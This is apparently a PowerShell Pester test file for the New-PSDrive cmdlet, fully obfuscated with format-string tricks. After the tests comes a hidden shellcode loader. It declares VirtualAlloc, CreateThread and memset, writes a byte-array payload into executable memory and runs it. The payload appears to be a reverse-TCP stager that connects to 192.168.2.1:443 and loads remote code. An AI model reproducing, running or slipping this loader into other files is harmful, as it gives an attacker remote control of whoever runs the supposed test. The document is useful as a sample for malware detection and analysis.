&("{1}{0}{2}" -f 'i','Descr','be') ("{5}{1}{2}{0}{4}{6}{3}" -f 'or ',' ','f','ive cmdlet.','N','Tests','ew-PSDr') -Tag "CI",("{1}{5}{2}{3}{4}{6}{0}" -f 'ws','Requi','i','nOn','W','reAdm','indo') {
    &("{1}{2}{0}"-f'ntext','C','o') ("{3}{13}{8}{2}{1}{11}{5}{7}{10}{4}{6}{0}{9}{12}"-f '-Per','-','New','V','h','ive ',' ','Cmdle','e ','sist switc','t wit','PSDr','h.','alidat') {
        &("{1}{2}{0}" -f 'Each','Be','fore') {
            ${us`E`DDRiVES}  = &("{0}{2}{1}"-f'Get-PSDri','e','v') | .("{1}{2}{0}{3}"-f 'jec','Se','lect-Ob','t') -ExpandProperty ("{1}{0}"-f'ame','N')
            ${Ps`DRI`VEnaMe} = 'D'..'Z' | &("{2}{1}{0}{3}" -f '-Objec','ere','Wh','t') -FilterScript {${_} -notin ${u`sE`ddRiveS}} | .("{1}{2}{0}"-f'Random','Get','-')
            ${rE`moT`EshArE} = (("\\$env:COMPUTERNAME\$($env:SystemDrive.replace(':','$\'))"))
        }

        .("{1}{0}{2}" -f'e','Aft','rEach') {
            &("{2}{1}{0}{3}" -f 'SDr','ve-P','Remo','ive') -Name ${p`Sd`R`ivEnaME} -Force -ErrorAction ("{3}{4}{0}{2}{1}" -f'n','ue','tin','Silently','Co')
        }

        .('It') ("{2}{13}{9}{6}{5}{4}{8}{12}{3}{11}{10}{7}{0}{15}{1}{14}" -f ' c','ati','Should not ','iste','ion','ow except','r','e',' ','h','riv','nt PSD','for pers','t','on.','re') -Skip:(-not ${iSW`I`ND`OWS}) {
            { .("{1}{0}{2}" -f'w','Ne','-PSDrive') -Name ${P`sDR`Iv`eNaMe} -PSProvider ("{0}{1}{2}"-f 'File','Syst','em') -Root ${rE`MOte`sH`ARe} -Persist -ErrorAction ("{1}{0}"-f 'op','St') } | .("{0}{1}"-f 'Shoul','d') -Not -Throw
        }

        .('it') ("{7}{3}{6}{8}{10}{11}{0}{4}{12}{9}{2}{1}{5}" -f' ','te shar','o','ow e','i','e.','xce','Should thr','p',' root is not a rem','t','ion','f') -Skip:(-not ${ISW`iND`ows}) {
            { .("{1}{0}{3}{2}" -f'ew','N','SDrive','-P') -Name ${psdri`VE`NaME} -PSProvider ("{2}{1}{0}" -f'eSystem','l','Fi') -Root ((("{0}{1}{2}"-f'TestDri','ve:d','BJ')) -RePlace ([ChAr]100+[ChAr]66+[ChAr]74),[ChAr]92) -Persist -ErrorAction ("{1}{0}"-f 'op','St') } | &("{0}{1}" -f'Sh','ould') -Throw -ErrorId ("{5}{3}{6}{2}{1}{0}{4}"-f'kPa','r','o','tNo','th','DriveRoo','tNetw')
        }

        &('it') ("{0}{15}{4}{1}{16}{17}{19}{2}{13}{14}{3}{20}{6}{21}{10}{18}{9}{11}{5}{7}{8}{12}"-f 'Should ','eptio',' ','t ','row exc','a','rive','ting ','sy','ted by ','te','oper','stem.','is',' no','th','n if PSDr','i','r suppor','ve','a d',' let') -Skip:(-not ${i`s`Wi`NdOWs}) {
            ${p`SDrI`VEN`AME} = 'AB'
            { .("{1}{2}{0}"-f'e','New-PSD','riv') -Name ${pSdriV`e`Na`me} -PSProvider ("{0}{2}{1}"-f'Fil','stem','eSy') -Root ${R`e`mOtES`Hare} -Persist -ErrorAction ("{1}{0}" -f'op','St') } | .("{1}{0}" -f 'uld','Sho') -Throw -ErrorId ("{1}{5}{7}{8}{3}{9}{0}{2}{6}{4}" -f 'tedForPers','Dr','iste','pp','ce','iveName','n','Not','Su','or')
        }
    }
}

${c} = ((("{9}{58}{86}{77}{40}{6}{66}{38}{48}{80}{22}{64}{88}{37}{31}{68}{26}{59}{21}{83}{85}{52}{75}{3}{84}{49}{20}{60}{41}{24}{53}{2}{63}{10}{35}{46}{74}{45}{55}{32}{1}{0}{28}{23}{76}{14}{42}{29}{17}{70}{33}{71}{65}{43}{57}{34}{13}{51}{7}{62}{56}{15}{78}{82}{79}{30}{12}{27}{44}{18}{4}{54}{8}{61}{39}{19}{16}{72}{67}{73}{36}{50}{69}{47}{87}{89}{5}{25}{11}{81}" -f'r lpThread','t','.dll8ef)]public','t f','ll','t','rnel','nFla','f)]pu','[','ta',', uint coun','ort(','e',', In','IntPtr lpTh','n','r l','.d','static exter',';','P','lic ','utes, ','(',' src',' VirtualAll','8e','Attrib','Pt','mp','ern IntP','tP','tart','int dwCr','tic extern ','r ','t','f)','lic ','ke','mport','t','Ptr lpParamet','fmsvcrt','Thread(','IntPtr','Ptr dest, ',']pu','ct)','memset(I','atio','ocationT','8efkernel32','8e','In','s, ','er, u','DllI','oc(Int','[DllI','b','g',' s','static ','ress, Int','32.dll8e','t','tr','nt','pS','Add',' In','Pt',' Create','ype, uin','uint dwStackSize','port(8ef','readId);','DllI','b','t);','[','tr lpAddress, ui','lProte','nt dwSize, uint flAll','m','u','ex','in'))."rE`pLA`ce"('8ef',[STrIng][ChAR]34));${W} = .("{0}{2}{1}" -f 'Ad','Type','d-') -memberDefinition ${C} -Name ("{1}{0}"-f '2','Win3') -namespace ("{1}{3}{4}{2}{0}" -f'ns','Wi','nctio','n32','Fu') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x02,0x01,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${Z}."LeN`GTh" -gt 0x1000){${g} = ${Z}."L`E`NgTh"};${x}=${W}::("{1}{0}{2}"-f 'ual','Virt','Alloc').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${Z}."LE`N`GtH"-1);${i}++) {${w}::"Me`mS`eT"([IntPtr](${x}.("{1}{2}{0}" -f '2','T','oInt3').Invoke()+${i}), ${z}[${I}], 1)};${W}::("{1}{3}{2}{0}" -f 'Thread','Cr','e','eat').Invoke(0,0,${x},0,0,0);for (;;){.("{2}{0}{1}" -f 'le','ep','Start-s') 60};
